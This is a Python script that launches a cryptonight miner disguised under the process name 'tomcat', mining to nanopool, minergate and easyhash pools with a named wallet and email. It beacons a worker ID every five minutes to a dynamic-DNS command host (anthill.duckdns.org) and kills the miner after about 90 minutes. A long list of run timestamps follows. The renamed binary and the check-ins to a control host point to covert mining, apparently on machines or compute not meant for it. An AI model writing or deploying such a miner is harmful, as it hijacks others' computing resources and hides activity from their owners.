import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:05.922527
#2018-02-17 16:50:04.763565
#2018-02-17 18:38:03.781414
#2018-02-17 20:25:08.553180
#2018-02-17 22:12:01.732601
#2018-02-17 23:56:03.912349
#2018-02-18 01:47:02.121950
#2018-02-18 03:33:06.788432
#2018-02-18 05:21:04.972621
#2018-02-18 07:12:07.001559
#2018-02-18 09:00:08.131053
#2018-02-18 10:47:03.486975
#2018-02-18 12:29:05.583070
#2018-02-18 14:17:04.550853
#2018-02-18 16:07:07.798014
#2018-02-18 17:56:04.840275
#2018-02-18 19:43:05.366518
#2018-02-18 21:28:06.206735
#2018-02-18 23:17:04.778145
#2018-02-19 01:04:07.319978
#2018-02-19 02:51:04.773365
#2018-02-19 04:37:07.055511
#2018-02-19 06:22:01.859060
#2018-02-19 08:11:04.476999
#2018-02-19 10:01:08.460963
#2018-02-19 11:50:10.978759
#2018-02-19 13:38:04.614179
#2018-02-19 15:27:07.881996
#2018-02-19 17:17:07.270824
#2018-02-19 19:04:07.662311
#2018-02-19 20:51:06.930597
#2018-02-19 22:38:07.832003
#2018-02-20 00:23:07.192020
#2018-02-20 02:12:02.151286
#2018-02-20 04:02:07.547879
#2018-02-20 05:46:03.816823
#2018-02-20 07:31:08.639759
#2018-02-20 09:16:07.634021
#2018-02-20 10:59:07.620076
#2018-02-20 12:46:09.087771
#2018-02-20 14:32:01.478038
#2018-02-20 16:16:08.585577
#2018-02-20 18:03:05.917953
#2018-02-20 19:53:07.993604
#2018-02-20 21:41:05.376728
#2018-02-20 23:21:07.931015
#2018-02-21 01:05:06.671695
#2018-02-21 02:52:07.904955
#2018-02-21 04:40:09.748528
#2018-02-21 06:28:06.482965
#2018-02-21 08:13:07.628864
#2018-02-21 09:59:05.143744
#2018-02-21 11:46:07.491249
#2018-02-21 13:37:08.194545
#2018-02-21 15:21:02.120505
#2018-02-21 17:10:13.596935
#2018-02-21 18:59:06.091590
#2018-02-21 20:48:09.400462
#2018-02-21 22:34:08.096388
#2018-02-22 01:31:03.998576
#2018-02-22 03:19:05.460220
#2018-02-22 05:06:08.294566
#2018-02-22 06:49:02.139707
#2018-02-22 08:37:05.473234
#2018-02-22 10:24:04.634001
#2018-02-22 12:09:01.711802
#2018-02-22 13:54:12.789852
#2018-02-22 15:43:01.520450
#2018-02-22 17:31:06.650137
#2018-02-22 19:17:10.340538
#2018-02-22 21:10:09.636845
#2018-02-22 22:56:04.337657
#2018-02-23 00:44:09.378101
#2018-02-23 02:33:04.996180
#2018-02-23 04:22:08.565133
#2018-02-23 06:09:04.407465
#2018-02-23 07:54:07.125517
#2018-02-23 10:10:08.132784
#2018-02-23 12:03:06.153449
#2018-02-23 13:50:04.326898
#2018-02-23 15:39:09.474368
#2018-02-23 17:27:06.220740
#2018-02-23 19:14:04.308252
#2018-02-23 20:58:06.767710
#2018-02-23 22:43:06.413925
#2018-02-24 00:30:08.763951
#2018-02-24 02:21:01.949704
#2018-02-24 04:12:05.859381
#2018-02-24 06:03:05.846511
#2018-02-24 07:51:05.446475
#2018-02-24 09:35:04.353243
#2018-02-24 11:28:07.910323
#2018-02-24 13:17:07.149488
#2018-02-24 15:08:06.908936
#2018-02-24 16:57:06.082259
#2018-02-24 18:45:06.295887
#2018-02-24 20:36:03.431771
#2018-02-24 22:41:01.681495
#2018-02-25 01:47:07.082086
#2018-02-25 05:23:05.005176
#2018-02-25 11:34:04.332498